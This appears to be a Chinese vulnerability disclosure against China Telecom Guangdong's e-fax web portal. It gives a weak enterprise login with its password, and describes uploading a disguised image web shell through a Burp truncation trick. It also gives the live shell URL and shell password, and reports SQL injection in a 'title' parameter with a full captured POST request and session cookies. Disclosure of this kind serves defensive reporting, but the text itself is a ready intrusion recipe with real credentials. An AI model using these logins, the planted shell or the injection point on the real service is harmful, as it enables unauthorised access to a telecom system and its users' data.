DOC《中国电信股份有限公司广东分公司》

中国电信股份有限公司广东分公司 弱口令 登陆选择企业登陆,企业账号 admin@02083377623 密码12345678 任意文件上传 传真管理点击写传真 传真文件地方上传个图片马,burp抓包,并且截断上传 得到shell:http://efax.

gdbnet.cn/upload/201708/02080720390201708071506442181.jsp 密码13l4l0ve sql注入 存在大量注入,举例一处 在高级设置-公告消息的地方,参数title存在注入 POST /GDbnetfaxC/messageAction.do?action=listEX HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */* Referer: http://efax.gdbnet.cn/GDbnetfaxC/messageAction.do?action=listEX Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible;

MSIE 7.0;

Windows NT 5.1;

Trident/4.0;

.NET CLR 2.0.50727;

.NET4.0C;

.NET4.0E;

.NET CLR 3.0.04506.30;

.NET CLR 3.0.04506.648;

.NET CLR 3.5.21022) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: efax.gdbnet.cn Content-Length:

26 Pragma: no-cache Cookie: JSESSIONID=F71DD3D4E45F761713182DBB9ED78228;

__utma=168990718.1882697417.1502069520.1502069520.1502069520.1;

__utmc=168990718;

__utmz=168990718.1502069520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);

Hm_lvt_fb2357ae728031f73d3586dd7edd4007=1502072307,1502086502;

Hm_lpvt_fb2357ae728031f73d3586dd7edd4007=1502086982;

__utma=167241322.1824616098.1502072305.1502072305.1502084446.2;

__utmb=167241322.31.10.1502084446;

__utmc=167241322;

__utmz=167241322.1502072305.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);

JSESSIONID=DD8B3D8AECAE4EE53DC7B84C18B1B360 Connection: close title=&starttime=&endtime=